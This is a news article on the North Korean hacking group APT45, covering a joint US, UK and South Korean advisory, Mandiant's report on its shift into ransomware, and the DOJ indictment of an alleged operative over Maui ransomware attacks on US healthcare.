The United States and other countries are putting a spotlight on a group of North Korean-backed hackers that is conducting cyberespionage campaigns around the world to steal classified secrets that can be used for the country’s nuclear weapons program.

At the same time, researchers with Google’s Mandiant cybersecurity unit are detailing how the threat group, APT45 – which also is known as Anadriel and Onyx Sleet and is part of North Korea’s intelligence operations – recently has expanded its capabilities to include ransomware operations against financial services organizations.

North Korea – or the Democratic People’s Republic of Korea (DPRK) – is routinely listed by cybersecurity agencies in the United States as being among the top hubs – along with Russia, China, and Iran – of state-sponsored cyberattacks, including through the notorious Lazarus Group and its many subgroups and via a variety of other schemes, including software supply-chain attacks and the planting of North Korean operatives as IT workers in companies around the world.

The primary goal of APT45, Lazarus, and other cybercrimes is to raise money and steal information that can be fed back into the country’s nuclear and ballistic missile programs, skirting around sanctions implemented by the United States and other countries.

In a joint advisory this week, the United States, UK, and South Korea outlined APT45’s myriad campaigns targeting countries’ defense, aerospace, nuclear, and engineering organizations to steal sensitive and classified technical information. The threat is not only against the three countries but also Japan and India.

In addition, APT45 – which is part of North Korea’s Reconnaissance General Bureau (RGB) 3rd Bureau, a military intelligence unit – is using ransomware attacks against U.S. healthcare organizations to fund their cyber-spying activities, a trend noted by Mandiant researchers in their report this week.

How They Operate

“The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation,” the agencies wrote in the 30-page advisory.

From there, they establish persistence in the compromised systems, escalate privileges via common information-stealing tools like Mimikatz, and then deploy custom malware, remote access tools, and open-source software to move laterally through networks and to exfiltrate data. They also run phishing attacks.

APT45 hackers are targeting a broad range of industries looking to steal information about everything from tanks and combat ships to submarines, fighter aircraft, drones, missiles and missile defense systems, and satellites. They’ve also stolen data about uranium processing and enrichment, nuclear-related information about power plants, government facilities, and research, shipbuilding, and robotics.

Justice Department (DOJ) and FBI officials said that targets in the United States include NASA and Air Force bases in Georgia and Texas. Other entities – including South Korean and Taiwanese defense contractors and a Chinese energy company – also were victims.

“The global cyber espionage operation that we have exposed today shows the lengths that DPRK state-sponsored actors are willing to go to pursue their military and nuclear programmes,” Paul Chichester, director of operations for the UK’s National Cyber Security Centre, said in a statement. “It should remind critical infrastructure operators of the importance of protecting the sensitive information and intellectual property they hold on their systems to prevent theft and misuse.”

North Korean Operative Indicted

The DOJ this week indicted a North Korean operative believed to be part of APT45 for his role in a conspiracy that involved using North Korean-developed ransomware to attack hospitals and other U.S. health care organizations. RIM and his co-conspirators then laundered the money ransomed and used it to fund other cyberattacks into government, defense, and technology entities around the world.

Rim Jong Hyok was part of the group that used the Maui ransomware to attack U.S. health care providers in a campaign that U.S. authorities shut down two years ago, according to DOJ officials. He and others would launder the cryptocurrency that was paid by the victims with the help of facilitators in Hong Kong.

“In at least one case, these Hong Kong facilitators converted ransom funds from cryptocurrency to Chinese yuan,” the DOJ said. “The yuan was then accessed from an ATM in China in the immediate vicinity of the Sino-Korean Friendship Bridge, which connects Dandong, China, and Sinuiju, North Korea., with at least one of these organizations.”

The money was used to lease private virtual servers to launch attacks against defense, technology, and other organizations in the United States. The APT45 actors stole terabytes of data, such as unclassified information about U.S. government employees, old technical information about military aircraft, intellectual property, and limited technical information about maritime and uranium processing projects, according to the DOJ and FBI.

Along with the indictment of Rim, the DOJ said they intercepted about $114,000 in crypto proceeds from ransomware attacks and money laundering operations and seized online accounts the conspirators used for their cyber operations. They also seized about $500,000 in crypto that was paid as ransom and related money laundering transactions. The agencies also are offering a reward of up to $10 million for information leading to the identification and location of Rim, who is believed to be in North Korea.

DPRK’s Shifting Priorities

APT45’s expansion into ransomware reflects the “DPRK’s changing priorities,” Mandiant researchers Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, and Michael Barnhart wrote in their report. Since at least 2009, the group conducted cyberthreat operations that aligned with “the shifting geopolitical interests of the North Korean state,” they wrote in their report this week. Now there is a ransomware component that includes both developing and deploying the malware.

“Additionally, while multiple DPRK-nexus groups focused on healthcare and pharmaceuticals during the initial stages of the COVID-19 pandemic, APT45 has continued to target this vertical longer than other groups, suggesting an ongoing mandate to collect related information,” they researchers wrote. “Separately, the group has conducted operations against nuclear-related entities, underscoring its role in supporting DPRK priorities.”

Targeting the Financial Sector

That said, APT45 was seen attacking financial sector firms as far back as 2016, using the RIFLE malware against a South Korean organization. In 2021, the group was found using a spear-phishing attack against a South Asian bank.

In 2019, the threat actors attacked nuclear research facilities and power in India and a year later targeted the crop science division of a multinational corporation, likely linked to the accelerated drop in agriculture production in North Korea after the country shut down cross-border trade as the COVID-19 pandemic spread.

Multiple North Korean threat groups put their focus on health care and pharmaceutical companies during a likely COVID-19 outbreak in the country in 2021, through APT has continued targeting such organizations.

The use of the Maui ransomware arose in 2022, though a year before, cybersecurity firm Kaspersky linked suspected APT45 clusters to the use of Shattered Glass, a ransomware uncovered by Mandiant.

“APT45 is one of North Korea’s longest running cyber operators, and the group’s activity mirrors the regime’s geopolitical priorities even as operations have shifted from classic cyber espionage against government and defense entities to include healthcare and crop science,” the Mandiant researchers wrote. “Financially motivated activity occurring alongside intelligence collection has become a defining characteristic of North Korean cyber operations, and we expect APT45 to continue both missions.”